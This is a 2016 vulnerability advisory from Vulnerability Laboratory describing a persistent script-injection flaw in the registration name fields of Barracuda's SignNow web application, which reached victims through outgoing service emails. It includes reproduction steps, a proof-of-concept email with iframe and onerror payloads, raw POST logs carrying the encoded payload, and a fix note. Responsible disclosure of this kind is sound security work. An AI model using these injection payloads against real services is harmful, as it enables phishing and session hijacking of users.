Document Title:
===============
Barracuda Networks SN #52 - Persistent Web Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1297

BNSEC ID: 0004001004

Tracking ID: CAS-03491-K1X2V0




Release Date:
=============
2016-02-03


Vulnerability Laboratory ID (VL-ID):
====================================
1297


Common Vulnerability Scoring System:
====================================
3.6


Product & Service Introduction:
===============================
In April 2013, Barracuda Networks acquired SignNow. SignNow is a cloud-based provider of electronic signature technology, developed in the 
United States. The company`s Software-as-a-Service platform enables individuals and businesses to sign, and manage documents from any computer. 
The e-signature product is also available for free on iPhone, iPad, and Android devices, which lets you upload documents from your smartphone`s 
e-mail, camera, or Dropbox account and tap to insert your signature.

The signatures within SignNow are legally recognized in the same way as traditional `wet ink` signatures as the company’s technology follows 
the Electronic Signatures in Global and National Commerce Act signed into law by former President Bill Clinton in 2000, as well as the 
European Union’s Directive on eSignatures.

(Copy of the Homepage: http://en.wikipedia.org/wiki/SignNow )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory discovered a persistent mail encoding web vulnerability in the official Barracuda Networks SignNow Web-Application.


Vulnerability Disclosure Timeline:
==================================
2016-02-03: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Barracuda Networks
Product: SignNow - Web Application 2014 Q3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Low


Technical Details & Description:
================================
A persistent mail encoding web vulnerability has been discovered in the official Barracuda Networks SignNow Web-Application.
The vulnerability allows remote attackers to inject own malicious script codes on the application-side of the vulnerable online service.

The application-side vulnerability is located in the first- and lastname values of the registration module input fields. Remote attackers 
are able to inject own malicious script codes in the first- and lastname values to compromise outgoing service mails of the barracuda webserver.
The attacker registers an user account and can execute in the header location next to the introduction sentence were the name values in mails 
becomes visible the own malicious code. The attacker vector of the issue is persistent and the request method to inject is POST.

The security risk of the mail encoding web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count 
of 3.6. Exploitation of the persistent vulnerability requires no privileged account or restricted access and with low or medium no user interaction. 
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent coordinated external redirects and 
persistent manipulation of affected or connected module context.


Request Method(s): (Inject)
					[+] POST

Vulnerable Service(s):
					[+] Signnow (Barracuda Networks)

Vulnerable Module(s):
					[+] Registration (Input Field Validation)


Vulnerable Parameter(s):
					[+] firstname
					[+] lastname


Proof of Concept (PoC):
=======================
The persistent mail encoding web vulnerability cna be exploited by remote attackers without privileged application user account and 
with low or medium user interaction. For security demonstration or to reproduce follow the provided information and steps below to continue.


Manual Vulnerability Reproduce:
1. Go to the signnow.com website of barracuda networks
2. Open the vulnerable registration formular of the website (https://signnow.com/l/solo/esignature)
3. Include your own script code payload (html, php or js) to the first- & lastname values of the registration module
4. Include a victim email inside of the registration mail and save the registration
Note: After processing to click the button the registration will be finalized and the malicious mail arrives through the barracuda service at the victims postbox
5. Successful reproduce of the persistent mail encoding web vulnerability in the registration module


PoC: eSignatures - Barracuda Networks Mail

<html>
<head>
<title>5 Ways eSignatures Drive Revenue With a High ROI</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part1"><tr><td><b>Betreff: </b>5 Ways eSignatures Drive Revenue With a High ROI</td></tr>
<tr><td><b>Von: </b>Brian Johnson <bjohnson@signnow.com></td></tr><tr><td><b>Datum: </b>12.08.2014 12:06</td></tr></table><table border=0 cellspacing=0 
cellpadding=0 width="100%" class="header-part2"><tr><td><b>An: </b>bkm@evolution-sec.com</td></tr></table><br>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" 
xml:lang="en" lang="en"><head><meta http-equiv="Content-Type" content="text/html;" /><title>Email Newsletter</title></head><body style="font-family: Helvetica, 
Arial, sans-serif; font-size: 12px">
<div>"><[PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE!]iframe src=http://www.vulnerability-lab.com><img src=x onerror=prompt(1337);,</div>
<div> </div>
<div>Thousands of companies are switching to eSigning as a way to drive their bottom line. Check out our research into the 
<a href="http://content.barracuda.com/e/10742/1ggc1sk/2smwxk/535939653">5 Key Drivers of eSignature ROI</a>. You’ll get a good overview of why eSigning makes 
sense for your business, including:</div>
<ul>
	<li>Closing deals faster</li>
	<li>Eliminating errors and lost files</li>
	<li>Improving efficiency</li>
	<li>Going paperless</li>
</ul>
<div>Bring your company into the 21st century and improve your bottom line. <a href="http://content.barracuda.com/e/10742/1ggc1sk/2smwxk/535939653">Download the 
Guide to eSigning ROI</a> now.<br>
<br>
Give me a ring if you have any questions about getting started,</div>
<div> </div>
<div>Brian Johnson</div>
<div>Manager, Sales Development</div>
<div>(408) 342-5564</div>
If you want to stop getting emails from me, http://content.barracuda.com/unsubscribe/u/10742/97bd4dd0c0c617e2123cfa6619df1b1a/535939653
<img alt="" src="http://content.barracuda.com/r/10742/1/535939653/open/1" /></body></html>
</body>
</html>



--- PoC Session Logs [POST] (Inject) ---
Status: 200[OK]
POST https://go.pardot.com/l/10742/2014-07-23/2v99b9 Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[764] Mime Type[text/html]
   Request Header:
      Host[go.pardot.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://signnow.com/l/team/esignature?users=+]
      Cookie[visitor_id10742=319428078]
      Connection[keep-alive]
   POST-Daten:
      oid[00D300000000E0m]
      retURL[https%3A%2F%2Fsignnow.com%2Fl%2Fthankyou.html]
      lead_source[web]
      00N30000000g7EE[SignNow%3A+Team+Eval]
      00N60000002ACtf[SignNow]
      first_name[%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com%3E1]
      last_name[%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com%3E2]
      company[evolution+security]
      title[ceo]
      email[bkm%40evolution-sec.com]
      country[DE]
      state[Hessen]
      zip[34125]
      phone[015776363337]
      00N30000000cYzF[10]
      00N30000000lkWP[sign_now_barracuda_tag_a%3A+%2C+google_keyword%3A+%2C+google_click_id%3A+%2C+landing_page_source%3A+team%2Fesignature]
      00N300000200cxC2[]
      submit[Start+a+Free+Trial]
   Response Header:
      Date[Mon, 18 Aug 2014 10:51:48 GMT]
      Server[Apache]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      Pragma[no-cache]
      X-Pardot-Rsp[28/206/239]
      P3P[CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT", policyref="/w3c/p3p.xml"]
      Vary[Accept-Encoding,User-Agent]
      Content-Encoding[gzip]
      Content-Length[764]
      Content-Type[text/html; charset=utf-8]
      Set-Cookie[pardot=v6fjr01qtgvml5rpcsi28ms1o4; path=/
visitor_id10742=319428078; expires=Sun, 18-Aug-2024 10:51:48 GMT; path=/; domain=.pardot.com]
      X-Pardot-LB[lb-d3]
      X-Pardot-Route[public]
      Connection[close]


Status: 200[OK]
GET https://signnow.com/l/thankyou.html Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[5599] Mime Type[text/html]
   Request Header:
      Host[signnow.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8]
      Cookie[AWSELB=71BF89DD1C8E4B50D0322FBC8BE6CADD106081F9D15080EB8ED1032966C88138EDD4A5CB887893AFCAB724785A51F8D152FEF40362F2141AC2A5272ABA2499E10DD1640D76; __utma=187131127.802971042.1408357989.1408357989.1408357989.1; __utmb=187131127.10.10.1408357989; __utmc=187131127; __utmz=187131127.1408357989.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); visitor_id10742=319428078; email=bkm%40evolution-sec.com]
      Connection[keep-alive]
   Response Header:
      Accept-Ranges[bytes]
      Content-Type[text/html; charset=UTF-8]
      Date[Mon, 18 Aug 2014 10:51:51 GMT]
      Etag["1660f86-15df-4f14c3ade7206"]
      Last-Modified[Fri, 31 Jan 2014 23:06:54 GMT]
      Server[Apache]
      X-Frame-Options[SAMEORIGIN]
      Content-Length[5599]
      Connection[keep-alive]



Reference(s):
https://signnow.com/l/solo/esignature
https://signnow.com/l/team/esignature?users=x[Integer]


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure restriction of the firstname and lastname input fields in the signnow registration module.
Encode the output in the outgoing mails to ensure that no script code execution can occur in the header loction.

Note: The vulnerability is already patched by the barracuda networks developer team in 2015 qarter 4.


Security Risk:
==============
The security risk of the application-side mail encoding web vulnerability in the signnow application service is estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either 
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers 
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even 
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation 
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break 
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    dev.vulnerability-db.com	 	- forum.vulnerability-db.com 		       		- magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2016 | Vulnerability Laboratory [Evolution Security]